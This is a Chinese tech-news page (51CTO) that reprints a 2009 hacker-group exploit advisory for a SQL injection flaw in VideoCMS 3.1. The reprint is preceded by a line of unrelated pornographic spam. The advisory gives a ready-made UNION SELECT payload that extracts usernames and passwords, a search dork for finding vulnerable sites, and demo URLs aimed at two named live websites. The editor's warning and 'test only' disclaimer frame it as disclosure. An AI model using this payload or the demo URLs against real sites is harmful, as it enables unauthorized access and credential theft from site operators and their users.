自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

VideoCMS存在SQL注入漏洞 使用此CMS的公司請做防范

原創(chuàng)
作者:鮮橙加冰
安全
VideoCMS存在SQL injection漏洞,使用此CMS的企業(yè)請做防范。

【51CTO.com綜合消息】VideoCMS存在SQL injection漏洞,使用此CMS的公司請做防范。以下是51CTO編輯找到的測試代碼,僅做測試,請勿用于非法用途。

[~] VideoCMS SQL injection vulnerability - (id)                                   #

[~] Author : kaMtiEz (kamzcrew@gmail.com)                                    #

[~] Homepage : http://www.indonesiancoder.com                                  #

[~] Date : Desember 14, 2009                                               #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://www.codemight.com/
[+] Download : -
[+] version : 3.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : dunno           
[+] Location : INDONESIA - JOGJA
[+] description http://www.codemight.com/index.php?m=product&p=1

##################################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?m=video&v=[VALID-ID][SQL]

[ Exploit ]

/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--

[ Demo ]

http://mysingaporetube.com/index.php?m=video&v=502/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--
http://www.codemight.com/videocms/index.php?m=video&v=23/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--

===========================================================================

[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] segelas vodka menemaniku setiap malam .. :P
[+] Dengerin Radio yach di http://antisecradio.fm ok coy ?

[ QUOTE ]

[+] rm -rf

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM

【編輯推薦】

  1. Oracle數(shù)據(jù)庫內(nèi)部安全威脅:嚴(yán)重性
  2. 專題:網(wǎng)站常見的攻擊與防御
  3. 卡巴斯基發(fā)布2010年網(wǎng)絡(luò)威脅六項預(yù)測
  4. Web應(yīng)用防火墻是如何為客戶提供防護(hù)的
  5. 選擇硬件防火墻時你應(yīng)注意的十件事
  6. 深入理解防火墻 有效屏蔽外界的攻擊
  7. 防火墻功能分類及其局限性介紹分析
責(zé)任編輯:王文文 來源: 51CTO.com
SQL injectionVideoCMS
相關(guān)推薦

2012-12-19 10:36:06

2024-12-04 13:33:43

2009-07-20 15:37:09

iBatis like注入漏洞

2010-09-08 13:31:24

2010-10-22 15:18:18

SQL注入漏洞

2009-12-03 18:23:23

2013-01-14 11:26:27

2009-11-02 13:47:09

2009-10-25 13:32:09

2021-09-16 09:05:45

SQL注入漏洞網(wǎng)絡(luò)攻擊

2015-07-09 14:36:12

2023-12-01 16:21:42

2009-02-12 10:14:16

2017-05-02 09:02:14

2018-03-29 10:16:04

2024-10-12 10:57:21

2012-11-16 11:50:11

2010-09-08 14:02:46

2021-02-26 13:18:38

Node.js漏洞代碼

2013-07-27 14:14:25

點贊
收藏

51CTO技術(shù)棧公眾號